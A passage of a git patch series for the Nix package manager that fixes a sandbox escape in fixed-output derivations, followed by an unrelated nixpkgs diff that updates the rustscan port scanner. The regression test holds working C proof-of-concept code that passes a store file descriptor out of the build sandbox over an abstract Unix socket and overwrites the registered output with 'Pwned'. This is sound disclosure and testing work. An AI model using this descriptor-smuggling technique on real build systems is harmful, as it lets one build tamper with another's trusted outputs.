+ hdr->cmsg_type = SCM_RIGHTS;
+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+ msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+ // Write a single null byte too.
+ msg.msg_iov = malloc(sizeof(struct iovec));
+ msg.msg_iov[0].iov_base = "";
+ msg.msg_iov[0].iov_len = 1;
+ msg.msg_iovlen = 1;
+
+ // Send it to the othher side of this connection.
+ res = sendmsg(sock, &msg, 0);
+ if (res < 0) perror("sendmsg");
+ int buf;
+
+ // Wait for the server to close the socket, implying that it has
+ // received the commmand.
+ recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 000000000..82acf37e6
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Bind to the socket.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+ int res = bind(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0) perror("bind");
+
+ res = listen(sock, 1);
+ if (res < 0) perror("listen");
+
+ int smuggling_fd = -1;
+
+ // Accept the connection a first time to receive the file descriptor.
+ fprintf(stderr, "%s\n", "Waiting for the first connection");
+ int a = accept(sock, 0, 0);
+ if (a < 0) perror("accept");
+
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Receive the file descriptor as sent by the smuggler.
+ recvmsg(a, &msg, 0);
+
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ while (hdr) {
+ if (hdr->cmsg_level == SOL_SOCKET
+ && hdr->cmsg_type == SCM_RIGHTS) {
+
+ // Grab the copy of the file descriptor.
+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+ }
+
+ hdr = CMSG_NXTHDR(&msg, hdr);
+ }
+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+ close(a);
+
+ // Wait for a second connection, which will tell us that the build is
+ // done
+ a = accept(sock, 0, 0);
+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+ // Write a new content to the file
+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+ char * new_content = "Pwned\n";
+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+ if (written_bytes != strlen(new_content)) perror("write");
+}
From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<theophane.hufschmitt@tweag.io>
Date: Tue, 13 Feb 2024 08:28:02 +0100
Subject: [PATCH 2/4] Copy the output of fixed-output derivations before
registering them
It is possible to exfiltrate a file descriptor out of the build sandbox
of FODs, and use it to modify the store path after it has been
registered.
To avoid that issue, don't register the output of the build, but a copy
of it (that will be free of any leaked file descriptor).
---
src/libstore/build.cc | 11 +++++++++--
1 file changed, 9 insertions(+), 2 deletions(-)
diff --git a/src/libstore/build.cc b/src/libstore/build.cc
index d3a712c1a..3fb827a15 100644
--- a/src/libstore/build.cc
+++ b/src/libstore/build.cc
@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs()
throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path);
#endif
- /* Apply hash rewriting if necessary. */
+ /* Apply hash rewriting if necessary.
+ *
+ * For FODs, we always do the dump-and-restore dance regardless to make
+ * sure that there's no stale file descriptor pointing to the output
+ * of the path.
+ * */
bool rewritten = false;
- if (!outputRewrites.empty()) {
+ if (fixedOutput || !outputRewrites.empty()) {
+ if (!outputRewrites.empty()) {
printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path);
+ }
/* Canonicalise first. This ensures that the path we're
rewriting doesn't contain a hard link to /etc/shadow or
From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<7226587+thufschmitt@users.noreply.github.com>
Date: Wed, 21 Feb 2024 17:32:36 +0100
Subject: [PATCH 3/4] Fix a typo in a test comment
Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
---
tests/nixos/ca-fd-leak/default.nix | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
index c252caa4d..2fd5ca2d6 100644
--- a/tests/nixos/ca-fd-leak/default.nix
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -83,7 +83,7 @@ makeTest {
# Tell the smuggler server that we're done
machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
- # Check that the file was modified
+ # Check that the file was not modified
machine.succeed(r"""
cat ./result
test "$(cat ./result)" = "hello, world"
From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<theophane.hufschmitt@tweag.io>
Date: Fri, 1 Mar 2024 09:31:05 +0100
Subject: [PATCH 4/4] Add release notes
---
doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
new file mode 100644
index 000000000..ed451711e
--- /dev/null
+++ b/doc/manual/rl-next/fod-sandbox-escape.md
@@ -0,0 +1,14 @@
+---
+synopsis: Fix a FOD sandbox escape
+issues:
+prs:
+---
+
+Cooperating Nix derivations could send file descriptors to files in the Nix
+store to each other via Unix domain sockets in the abstract namespace. This
+allowed one derivation to modify the output of the other derivation, after Nix
+has registered the path as "valid" and immutable in the Nix database.
+In particular, this allowed the output of fixed-output derivations to be
+modified from their expected content.
+
+This isn't the case any more.

35
pkgs/tools/security/rustscan/default.nix
View file

@ -1,37 +1,52 @@
{ lib, rustPlatform, fetchCrate, nmap, stdenv, Security, perl, python3 }:
{
lib,
stdenv,
fetchFromGitHub,
nmap,
perl,
python3,
rustPlatform,
Security,
}:
rustPlatform.buildRustPackage rec {
pname = "rustscan";
version = "2.1.1";
version = "2.2.2";
src = fetchCrate {
inherit pname version;
sha256 = "sha256-yGVhbI1LivTIQEgqOK59T1+8SiTJBPIdftiXkwE4lZM=";
src = fetchFromGitHub {
owner = "RustScan";
repo = "RustScan";
rev = "refs/tags/${version}";
hash = "sha256-67XNEKzR72NOYlPbz2E9yf+THa1XN6muFJG2/iJa8AU=";
};
cargoSha256 = "sha256-UR3ktV80QU0N3f7qmqdhYpc5uwoPq4UvN40zEuMbp+Q=";
cargoHash = "sha256-U9Kn9xAG+emyi8cWUCNP32z7f19MK8AGgGR6vFJd62Q=";
postPatch = ''
substituteInPlace src/scripts/mod.rs \
--replace 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap'
--replace-fail 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap'
patchShebangs fixtures/.rustscan_scripts/*
'';
buildInputs = lib.optional stdenv.isDarwin Security;
nativeCheckInputs = [ perl python3 ];
nativeCheckInputs = [
perl
python3
];
# these tests require network access
checkFlags = [
# These tests require network access
"--skip=parse_correct_host_addresses"
"--skip=parse_hosts_file_and_incorrect_hosts"
];
meta = with lib; {
description = "Faster Nmap Scanning with Rust";
mainProgram = "rustscan";
homepage = "https://github.com/RustScan/RustScan";
changelog = "https://github.com/RustScan/RustScan/releases/tag/${version}";
license = licenses.gpl3Only;
maintainers = with maintainers; [ figsoda ];
mainProgram = "rustscan";
};
}